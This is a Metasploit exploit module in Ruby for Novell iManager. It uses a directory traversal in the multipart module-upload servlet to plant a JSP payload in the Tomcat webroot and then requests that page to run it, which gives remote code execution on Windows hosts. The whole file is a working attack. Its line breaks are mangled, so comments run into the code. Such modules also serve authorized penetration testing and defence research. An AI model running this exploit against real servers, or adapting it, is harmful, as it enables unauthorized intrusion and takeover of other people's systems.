### $Id: novell_imanager_upload.rb 10758 2010-10-19 22:54:19Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [/Apache-Coyote/ ]}
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,'Name' => 'Novell iManager getMultiPartParameters Arbitrary File Upload','Description'=> %q{
This module exploits a directory traversal vulnerability which
allows remote attackers to upload and execute arbitrary code.
PortalModuleInstallManager
},'Author' => ['jduck'],'License'=> MSF_LICENSE,'Version'=> '$Revision: 10758 $','Platform' => ['win'],'Privileged' => true,'References' =>
[#[ 'CVE', '2010-??' ],['OSVDB','68320'],['URL','http://www.zerodayinitiative.com/advisories/ZDI-10-190/'],['URL','http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2'],],'Targets'=>
[['Universal Windows Target',{'Arch' => ARCH_JAVA,'Payload'=>
{'DisableNops' => true,},}],],'DefaultTarget'=> 0,'DisclosureDate' => 'Oct 01 2010'))
register_options([
Opt::RPORT(8080)], self.class)end
def exploit
page = Rex::Text.rand_text_alpha_upper(8)+".jsp"
fname = '../../../../../../../Progra~1/Novell/Tomcat/webapps/ROOT/'
fname << page
dbl = Rex::MIME::Message.new
dbl.add_part(payload.encoded,"application/octet-stream", nil,"form-data; name=\"MODULE_FILE\"; filename=\"#{fname}\"")data = dbl.to_s
# For some unknown reason, the service is unhappy with an extra EOL.data.strip!
print_status("Uploading the payload via a POST request...")
res = send_request_cgi({'uri' => '/nps/servlet/modulemanager','version' => '1.1','method'=> 'POST','ctype' => "multipart/form-data; boundary=#{dbl.bound}",'data'=> data,}, 5)if( res and res.code == 200 and res.message =~ /OK/ )
print_status("Sending our second request to '#{page}'...")data = send_request_raw({'uri' => '/'+ page,'method'=> 'GET','version' => '1.0',}, 5)
handler
else
raise RuntimeError,'POST failed'endendend